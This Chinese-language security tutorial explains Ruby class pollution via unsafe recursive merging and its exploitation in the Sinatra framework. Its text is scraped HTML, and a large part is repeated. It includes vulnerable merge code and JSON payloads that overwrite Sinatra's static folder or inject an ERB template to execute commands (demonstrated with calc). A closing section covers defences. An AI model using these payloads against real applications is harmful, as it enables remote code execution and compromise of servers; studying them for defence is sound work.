Ruby类污染及其在Sinatra框架下的利用分析<\/h1>

1. Ruby类污染概述<\/h2>
Ruby类污染(Class Pollution)是一种类似于JavaScript原型链污染的安全漏洞，两者都是由于对象进行不安全的递归合并导致的。这种漏洞允许攻击者通过精心构造的输入修改类的属性或方法，可能导致严重的安全问题。<\/p>

1.1 与JavaScript原型链污染的对比<\/h3>

相似点<\/strong>：<\/p>

都是通过递归合并操作实现的<\/li>
都利用了语言的对象继承机制<\/li>
都可以污染共享的属性或方法<\/li> <\/ul> <\/li>

不同点<\/strong>：<\/p>

Ruby使用类继承体系而非原型链<\/li>
Ruby的污染目标通常是类变量(@@)或实例变量(@)<\/li>
Ruby的继承关系通过superclass\/subclasses访问<\/li> <\/ul> <\/li> <\/ul>
2. Ruby类基础<\/h2>
2.1 类定义与变量<\/h3>
class<\/span> Person<\/span> <\/span><\/span> @@cnt =<\/span> 1<\/span> # 类变量(类似静态变量)<\/span> <\/span><\/span> <\/span><\/span> # 定义属性访问器<\/span> <\/span><\/span> attr_accessor<\/span> :name<\/span>, :age<\/span> <\/span><\/span> <\/span><\/span> def<\/span> initialize<\/span>(name, age) <\/span><\/span> @name =<\/span> name # 实例变量<\/span> <\/span><\/span> @age =<\/span> age <\/span><\/span> end<\/span> <\/span><\/span> <\/span><\/span> def<\/span> greet<\/span> <\/span><\/span> "My name is <\/span>#{<\/span>@name}<\/span> and I am <\/span>#{<\/span>@age}<\/span> years old."<\/span> <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>2.2 Ruby对象特殊方法<\/h3> 方法<\/th> 描述<\/th> <\/tr> <\/thead> attr_accessor<\/code><\/td> 定义实例变量的getter和setter<\/td> <\/tr> initialize<\/code><\/td> 类的构造方法<\/td> <\/tr> to_s<\/code><\/td> 类似toString方法<\/td> <\/tr> inspect<\/code><\/td> 用于debug的对象表示<\/td> <\/tr> method_missing<\/code><\/td> 调用不存在方法时触发<\/td> <\/tr> respond_to?<\/code><\/td> 检查对象是否有某方法<\/td> <\/tr> send<\/code><\/td> 根据方法名调用(包括私有方法)<\/td> <\/tr> public_send<\/code><\/td> 调用公开方法<\/td> <\/tr> <\/tbody> <\/table> 2.3 类继承体系<\/h3> Ruby中所有类的顶层父类是BasicObject<\/code>：<\/p> class<\/span> MyClass<\/span>; end<\/span> <\/span><\/span>MyClass<\/span>.<\/span>superclass # => Object<\/span> <\/span><\/span>Object<\/span>.<\/span>superclass # => BasicObject<\/span> <\/span><\/span>BasicObject<\/span>.<\/span>superclass # => nil<\/span> <\/span><\/span><\/code><\/pre>关键属性：<\/p> class<\/code> - 当前对象的类<\/li> superclass<\/code> - 父类<\/li> subclasses<\/code> - 子类数组<\/li> instance_variables<\/code> - 实例变量名数组<\/li> class_variables<\/code> - 类变量名数组<\/li> <\/ul> 3. 不安全的递归合并<\/h2> 3.1 典型漏洞代码<\/h3> def<\/span> recursive_merge<\/span>(original, additional, current_obj =<\/span> original) <\/span><\/span> additional.<\/span>each do<\/span> |<\/span>key, value|<\/span> <\/span><\/span> if<\/span> value.<\/span>is_a?(Hash<\/span>) <\/span><\/span> if<\/span> current_obj.<\/span>respond_to?(key) <\/span><\/span> next_obj =<\/span> current_obj.<\/span>public_send(key) <\/span><\/span> recursive_merge(original, value, next_obj) <\/span><\/span> else<\/span> <\/span><\/span> new_object =<\/span> Object<\/span>.<\/span>new <\/span><\/span> current_obj.<\/span>instance_variable_set("@<\/span>#{<\/span>key}<\/span>"<\/span>, new_object) <\/span><\/span> current_obj.<\/span>singleton_class.<\/span>attr_accessor key <\/span><\/span> end<\/span> <\/span><\/span> else<\/span> <\/span><\/span> current_obj.<\/span>instance_variable_set("@<\/span>#{<\/span>key}<\/span>"<\/span>, value) <\/span><\/span> current_obj.<\/span>singleton_class.<\/span>attr_accessor key <\/span><\/span> end<\/span> <\/span><\/span> end<\/span> <\/span><\/span> original <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>3.2 漏洞分析<\/h3> 遍历additional<\/code>对象中的每个键值对<\/li> 处理嵌套哈希：如果当前对象响应键名：递归合并<\/li> 否则：创建新对象并设置为实例变量<\/li> <\/ul> <\/li> 处理非哈希值：直接在对象上设置实例变量<\/li> 创建访问器方法<\/li> <\/ul> <\/li> <\/ol> 4. 类污染利用场景<\/h2> 4.1 污染当前对象<\/h3> class<\/span> A<\/span> <\/span><\/span> attr_accessor<\/span> :x<\/span> <\/span><\/span> <\/span><\/span> def<\/span> initialize<\/span>(x) <\/span><\/span> @x =<\/span> x <\/span><\/span> end<\/span> <\/span><\/span> <\/span><\/span> def<\/span> merge_with<\/span>(additional) <\/span><\/span> recursive_merge(self, additional) <\/span><\/span> end<\/span> <\/span><\/span> <\/span><\/span> def<\/span> check<\/span> <\/span><\/span> protected_methods().<\/span>each do<\/span> |<\/span>method|<\/span> <\/span><\/span> instance_eval(method.<\/span>to_s) <\/span><\/span> end<\/span> <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span># 利用<\/span> <\/span><\/span>a =<\/span> A.<\/span>new(1<\/span>) <\/span><\/span>a.<\/span>merge_with({"protected_methods"<\/span>: [<\/span>"`calc`"<\/span>]<\/span>}) <\/span><\/span>a.<\/span>check # 执行calc<\/span> <\/span><\/span><\/code><\/pre>4.2 污染父类<\/h3> class<\/span> Base<\/span> <\/span><\/span> @@cmd =<\/span> "puts 1"<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>class<\/span> Cmder<\/span> <<\/span> Base<\/span> <\/span><\/span> def<\/span> merge_with<\/span>(additional) <\/span><\/span> recursive_merge(self, additional) <\/span><\/span> end<\/span> <\/span><\/span> <\/span><\/span> def<\/span> check<\/span> <\/span><\/span> eval(Base<\/span>.<\/span>cmd) # 实际访问的是实例变量@cmd<\/span> <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span># 利用<\/span> <\/span><\/span>c =<\/span> Cmder<\/span>.<\/span>new <\/span><\/span>c.<\/span>merge_with({"class"<\/span>: {"superclass"<\/span>: {"cmd"<\/span>: "`calc`"<\/span>}}}) <\/span><\/span>c.<\/span>check # 执行calc<\/span> <\/span><\/span><\/code><\/pre>注意：这会创建实例变量@cmd<\/code>而非修改类变量@@cmd<\/code><\/p> 4.3 污染随机子类<\/h3> class<\/span> Cmder<\/span> <\/span><\/span> @@cmd =<\/span> "puts 1"<\/span> <\/span><\/span> <\/span><\/span> def<\/span> check<\/span> <\/span><\/span> eval(Cmder<\/span>.<\/span>cmd) <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>class<\/span> Innocent<\/span> <\/span><\/span> def<\/span> merge_with<\/span>(additional) <\/span><\/span> recursive_merge(self, additional) <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span># 利用 - 通过多次尝试污染Cmder<\/span> <\/span><\/span>1000<\/span>.<\/span>times do<\/span> <\/span><\/span> i =<\/span> Innocent<\/span>.<\/span>new <\/span><\/span> i.<\/span>merge_with({ <\/span><\/span> "class"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "subclasses"<\/span>: { <\/span><\/span> "sample"<\/span>: { <\/span><\/span> "cmd"<\/span>: "`calc`"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> }) <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>c =<\/span> Cmder<\/span>.<\/span>new <\/span><\/span>c.<\/span>check # 有概率执行calc<\/span> <\/span><\/span><\/code><\/pre>5. Sinatra框架下的利用<\/h2> 5.1 修改静态目录<\/h3> Sinatra默认配置静态目录的方式：<\/p> set :public_folder<\/span>, File<\/span>.<\/span>dirname(__FILE__) +<\/span> '\/static'<\/span> <\/span><\/span><\/code><\/pre>污染payload：<\/p> { <\/span><\/span> "class"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "subclasses"<\/span>: { <\/span><\/span> "sample"<\/span>: { <\/span><\/span> "public_folder"<\/span>: "E:\/Server"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.2 模板注入RCE<\/h3> Sinatra模板系统：<\/p> template :index<\/span> do<\/span> <\/span><\/span> '%div.title Hello World!'<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>get('\/'<\/span>) do<\/span> <\/span><\/span> erb :hello<\/span> <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>污染templates<\/code>属性实现RCE：<\/p> { <\/span><\/span> "class"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "subclasses"<\/span>: { <\/span><\/span> "sample"<\/span>: { <\/span><\/span> "templates"<\/span>: { <\/span><\/span> "hello"<\/span>: "<%= `calc` %>"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>6. 防御措施<\/h2> 避免不安全的递归合并<\/strong>：<\/p> 对合并操作进行严格的白名单控制<\/li> 限制合并深度<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 验证所有外部输入<\/li> 禁止特殊符号和危险方法名<\/li> <\/ul> <\/li> 使用安全的方法<\/strong>：<\/p> 避免使用instance_eval<\/code>、send<\/code>等危险方法<\/li> 使用public_send<\/code>替代send<\/code><\/li> <\/ul> <\/li> 最小权限原则<\/strong>：<\/p> 限制应用程序运行权限<\/li> 使用沙箱环境<\/li> <\/ul> <\/li> 监控和日志<\/strong>：<\/p> 记录可疑的类修改操作<\/li> 设置警报机制<\/li> <\/ul> <\/li> <\/ol> 7. 总结<\/h2> Ruby类污染是一种强大的攻击技术，通过不安全的递归合并操作，攻击者可以：<\/p> 修改类的行为和属性<\/li> 覆盖关键配置<\/li> 实现RCE等严重攻击<\/li> <\/ul> 在Sinatra等框架中，这种技术尤其危险，因为它可以：<\/p> 修改框架的核心配置<\/li> 注入恶意模板<\/li> 改变应用程序的行为<\/li> <\/ul> 开发人员应当充分了解这种攻击方式，并在代码中实施适当的防护措施。<\/p>

方法<\/th>	描述<\/th> <\/tr> <\/thead>
`attr_accessor<\/code><\/td>`	定义实例变量的getter和setter<\/td> <\/tr>
`initialize<\/code><\/td>`	类的构造方法<\/td> <\/tr>
`to_s<\/code><\/td>`	类似toString方法<\/td> <\/tr>
`inspect<\/code><\/td>`	用于debug的对象表示<\/td> <\/tr>
`method_missing<\/code><\/td>`	调用不存在方法时触发<\/td> <\/tr>
`respond_to?<\/code><\/td>`	检查对象是否有某方法<\/td> <\/tr>
`send<\/code><\/td>`	根据方法名调用(包括私有方法)<\/td> <\/tr>
`public_send<\/code><\/td>`	调用公开方法<\/td> <\/tr> <\/tbody> <\/table> 2.3 类继承体系<\/h3> Ruby中所有类的顶层父类是`BasicObject<\/code>：<\/p>` class<\/span> MyClass<\/span>; end<\/span> <\/span><\/span>MyClass<\/span>.<\/span>superclass # => Object<\/span> <\/span><\/span>Object<\/span>.<\/span>superclass # => BasicObject<\/span> <\/span><\/span>BasicObject<\/span>.<\/span>superclass # => nil<\/span> <\/span><\/span><\/code><\/pre>关键属性：<\/p> class<\/code> - 当前对象的类<\/li> superclass<\/code> - 父类<\/li> subclasses<\/code> - 子类数组<\/li> instance_variables<\/code> - 实例变量名数组<\/li> class_variables<\/code> - 类变量名数组<\/li> <\/ul> 3. 不安全的递归合并<\/h2> 3.1 典型漏洞代码<\/h3> def<\/span> recursive_merge<\/span>(original, additional, current_obj =<\/span> original) <\/span><\/span> additional.<\/span>each do<\/span> \|<\/span>key, value\|<\/span> <\/span><\/span> if<\/span> value.<\/span>is_a?(Hash<\/span>) <\/span><\/span> if<\/span> current_obj.<\/span>respond_to?(key) <\/span><\/span> next_obj =<\/span> current_obj.<\/span>public_send(key) <\/span><\/span> recursive_merge(original, value, next_obj) <\/span><\/span> else<\/span> <\/span><\/span> new_object =<\/span> Object<\/span>.<\/span>new <\/span><\/span> current_obj.<\/span>instance_variable_set("@<\/span>#{<\/span>key}<\/span>"<\/span>, new_object) <\/span><\/span> current_obj.<\/span>singleton_class.<\/span>attr_accessor key <\/span><\/span> end<\/span> <\/span><\/span> else<\/span> <\/span><\/span> current_obj.<\/span>instance_variable_set("@<\/span>#{<\/span>key}<\/span>"<\/span>, value) <\/span><\/span> current_obj.<\/span>singleton_class.<\/span>attr_accessor key <\/span><\/span> end<\/span> <\/span><\/span> end<\/span> <\/span><\/span> original <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>3.2 漏洞分析<\/h3> 遍历additional<\/code>对象中的每个键值对<\/li> 处理嵌套哈希：如果当前对象响应键名：递归合并<\/li> 否则：创建新对象并设置为实例变量<\/li> <\/ul> <\/li> 处理非哈希值：直接在对象上设置实例变量<\/li> 创建访问器方法<\/li> <\/ul> <\/li> <\/ol> 4. 类污染利用场景<\/h2> 4.1 污染当前对象<\/h3> class<\/span> A<\/span> <\/span><\/span> attr_accessor<\/span> :x<\/span> <\/span><\/span> <\/span><\/span> def<\/span> initialize<\/span>(x) <\/span><\/span> @x =<\/span> x <\/span><\/span> end<\/span> <\/span><\/span> <\/span><\/span> def<\/span> merge_with<\/span>(additional) <\/span><\/span> recursive_merge(self, additional) <\/span><\/span> end<\/span> <\/span><\/span> <\/span><\/span> def<\/span> check<\/span> <\/span><\/span> protected_methods().<\/span>each do<\/span> \|<\/span>method\|<\/span> <\/span><\/span> instance_eval(method.<\/span>to_s) <\/span><\/span> end<\/span> <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span># 利用<\/span> <\/span><\/span>a =<\/span> A.<\/span>new(1<\/span>) <\/span><\/span>a.<\/span>merge_with({"protected_methods"<\/span>: [<\/span>"`calc`"<\/span>]<\/span>}) <\/span><\/span>a.<\/span>check # 执行calc<\/span> <\/span><\/span><\/code><\/pre>4.2 污染父类<\/h3> class<\/span> Base<\/span> <\/span><\/span> @@cmd =<\/span> "puts 1"<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>class<\/span> Cmder<\/span> <<\/span> Base<\/span> <\/span><\/span> def<\/span> merge_with<\/span>(additional) <\/span><\/span> recursive_merge(self, additional) <\/span><\/span> end<\/span> <\/span><\/span> <\/span><\/span> def<\/span> check<\/span> <\/span><\/span> eval(Base<\/span>.<\/span>cmd) # 实际访问的是实例变量@cmd<\/span> <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span># 利用<\/span> <\/span><\/span>c =<\/span> Cmder<\/span>.<\/span>new <\/span><\/span>c.<\/span>merge_with({"class"<\/span>: {"superclass"<\/span>: {"cmd"<\/span>: "`calc`"<\/span>}}}) <\/span><\/span>c.<\/span>check # 执行calc<\/span> <\/span><\/span><\/code><\/pre>注意：这会创建实例变量@cmd<\/code>而非修改类变量@@cmd<\/code><\/p> 4.3 污染随机子类<\/h3> class<\/span> Cmder<\/span> <\/span><\/span> @@cmd =<\/span> "puts 1"<\/span> <\/span><\/span> <\/span><\/span> def<\/span> check<\/span> <\/span><\/span> eval(Cmder<\/span>.<\/span>cmd) <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>class<\/span> Innocent<\/span> <\/span><\/span> def<\/span> merge_with<\/span>(additional) <\/span><\/span> recursive_merge(self, additional) <\/span><\/span> end<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span># 利用 - 通过多次尝试污染Cmder<\/span> <\/span><\/span>1000<\/span>.<\/span>times do<\/span> <\/span><\/span> i =<\/span> Innocent<\/span>.<\/span>new <\/span><\/span> i.<\/span>merge_with({ <\/span><\/span> "class"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "subclasses"<\/span>: { <\/span><\/span> "sample"<\/span>: { <\/span><\/span> "cmd"<\/span>: "`calc`"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> }) <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>c =<\/span> Cmder<\/span>.<\/span>new <\/span><\/span>c.<\/span>check # 有概率执行calc<\/span> <\/span><\/span><\/code><\/pre>5. Sinatra框架下的利用<\/h2> 5.1 修改静态目录<\/h3> Sinatra默认配置静态目录的方式：<\/p> set :public_folder<\/span>, File<\/span>.<\/span>dirname(__FILE__) +<\/span> '\/static'<\/span> <\/span><\/span><\/code><\/pre>污染payload：<\/p> { <\/span><\/span> "class"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "subclasses"<\/span>: { <\/span><\/span> "sample"<\/span>: { <\/span><\/span> "public_folder"<\/span>: "E:\/Server"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.2 模板注入RCE<\/h3> Sinatra模板系统：<\/p> template :index<\/span> do<\/span> <\/span><\/span> '%div.title Hello World!'<\/span> <\/span><\/span>end<\/span> <\/span><\/span> <\/span><\/span>get('\/'<\/span>) do<\/span> <\/span><\/span> erb :hello<\/span> <\/span><\/span>end<\/span> <\/span><\/span><\/code><\/pre>污染templates<\/code>属性实现RCE：<\/p> { <\/span><\/span> "class"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "superclass"<\/span>: { <\/span><\/span> "subclasses"<\/span>: { <\/span><\/span> "sample"<\/span>: { <\/span><\/span> "templates"<\/span>: { <\/span><\/span> "hello"<\/span>: "<%= `calc` %>"<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>6. 防御措施<\/h2> 避免不安全的递归合并<\/strong>：<\/p> 对合并操作进行严格的白名单控制<\/li> 限制合并深度<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 验证所有外部输入<\/li> 禁止特殊符号和危险方法名<\/li> <\/ul> <\/li> 使用安全的方法<\/strong>：<\/p> 避免使用instance_eval<\/code>、send<\/code>等危险方法<\/li> 使用public_send<\/code>替代send<\/code><\/li> <\/ul> <\/li> 最小权限原则<\/strong>：<\/p> 限制应用程序运行权限<\/li> 使用沙箱环境<\/li> <\/ul> <\/li> 监控和日志<\/strong>：<\/p> 记录可疑的类修改操作<\/li> 设置警报机制<\/li> <\/ul> <\/li> <\/ol> 7. 总结<\/h2> Ruby类污染是一种强大的攻击技术，通过不安全的递归合并操作，攻击者可以：<\/p> 修改类的行为和属性<\/li> 覆盖关键配置<\/li> 实现RCE等严重攻击<\/li> <\/ul> 在Sinatra等框架中，这种技术尤其危险，因为它可以：<\/p> 修改框架的核心配置<\/li> 注入恶意模板<\/li> 改变应用程序的行为<\/li> <\/ul> 开发人员应当充分了解这种攻击方式，并在代码中实施适当的防护措施。<\/p>